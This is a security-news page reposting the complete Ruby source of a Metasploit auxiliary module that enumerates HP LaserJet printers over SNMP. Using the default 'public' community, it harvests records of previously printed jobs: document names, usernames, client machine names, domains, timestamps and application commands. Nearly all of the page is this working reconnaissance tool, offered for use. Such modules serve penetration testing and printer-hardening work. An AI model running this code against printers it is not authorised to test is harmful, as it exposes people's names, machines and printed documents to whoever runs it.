Security
Headlines
HeadlinesLatestCVEs

Headline

HP LaserJet Printer SNMP Enumeration

This Metasploit module allows enumeration of files previously printed. It provides details as filename, client, timestamp and username information. The default community used is "public".

Packet Storm
#mac#git#php#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SNMPClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'        => 'HP LaserJet Printer SNMP Enumeration',      'Description' => %q{        This module allows enumeration of files previously printed.        It provides details as filename, client, timestamp and username information.        The default community used is "public".      },      'References'  =>        [          [ 'URL', 'https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],          [ 'URL', 'https://net-snmp.sourceforge.io/docs/man/snmpwalk.html' ],          [ 'URL', 'http://www.nothink.org/codes/snmpcheck/index.php' ],          [ 'URL', 'http://www.securiteam.com/securitynews/5AP0S2KGVS.html' ],          [ 'URL', 'http://stuff.mit.edu/afs/athena/dept/cron/tools/share/mibs/290923.mib' ],        ],      'Author'      => 'Matteo Cantoni <goony[at]nothink.org>',      'License'     => MSF_LICENSE      ))  end  def run_host(ip)    begin      snmp = connect_snmp      vprint_status("Connecting to #{ip}")      output_data = []      output_data << "IP address  : #{ip}"      sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s      output_data << "Hostname    : #{sysName.strip}"      sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s      sysDesc.gsub!(/^\s+|\s+$|\n+|\r+/, ' ')      output_data << "Description : #{sysDesc.strip}"      sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s      output_data << "Contact     : #{sysContact.strip}" if not sysContact.empty?      sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s      output_data << "Location    : #{sysLocation.strip}" if not sysLocation.empty?      output_data << ""      snmp.walk([        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1",    # job-info-name1  - document name1        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.2",    # job-info-name2  - document name2        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1", # job-info-attr-1 - username        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2", # job-info-attr-2 - machine name        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.3", # job-info-attr-3 - domain (?)        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.4", # job-info-attr-4 - timestamp        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.6", # job-info-attr-6 - application name        "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.7", # job-info-attr-7 - application command      ]) do |name1,name2,username,client,domain,timestamp,app_name,app_command|        filename = name1.value.to_s + name2.value.to_s        if (username.value.to_s !~ /noSuchInstance/)          if username.value.to_s =~ /^JobAcct(\d+)=(.*)/            username = $2          end        else          username = ''        end        if (client.value.to_s !~ /noSuchInstance/)          if client.value.to_s =~ /^JobAcct(\d+)=(.*)/            client = $2          end        else          client = ''        end        if (domain.value.to_s !~ /noSuchInstance/)          if domain.value.to_s =~ /^JobAcct(\d+)=(.*)/            domain = $2          end        else          domain = ''        end        if (timestamp.value.to_s !~ /noSuchInstance/)          if timestamp.value.to_s =~ /^JobAcct(\d+)=(.*)/            timestamp = $2          end        else          timestamp = ''        end        if (app_name.value.to_s !~ /noSuchInstance/)          if app_name.value.to_s =~ /^JobAcct(\d+)=(.*)/            app_name = $2          end        else          app_name = ''        end        if (app_command.value.to_s !~ /noSuchInstance/)          if app_command.value.to_s =~ /^JobAcct(\d+)=(.*)/            app_command = $2          end        else          app_command = ''        end        if not timestamp.empty?          output_data << "File name   : #{filename}"          output_data << "Username    : #{username}" if not username.empty?          output_data << "Client      : #{client}" if not client.empty?          output_data << "Domain      : #{domain}" if not domain.empty?          output_data << "Timestamp   : #{timestamp}" if not timestamp.empty?          output_data << "Application : #{app_name} (#{app_command})" if not app_name.empty?          output_data << ""        end      end      output_data.each do |row|        print_good("#{row}")      end      disconnect_snmp    rescue SNMP::RequestTimeout      print_error("#{ip}, SNMP request timeout.")    rescue Errno::ECONNREFUSED      print_error("#{ip}, Connection refused.")    rescue SNMP::InvalidIpAddress      print_error("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.")    rescue ::Interrupt    raise $!    rescue ::Exception => e      print_error("#{ip}, Unknown error: #{e.class} #{e}")    end  endend

Packet Storm: Latest News

Scapy Packet Manipulation Tool 2.6.1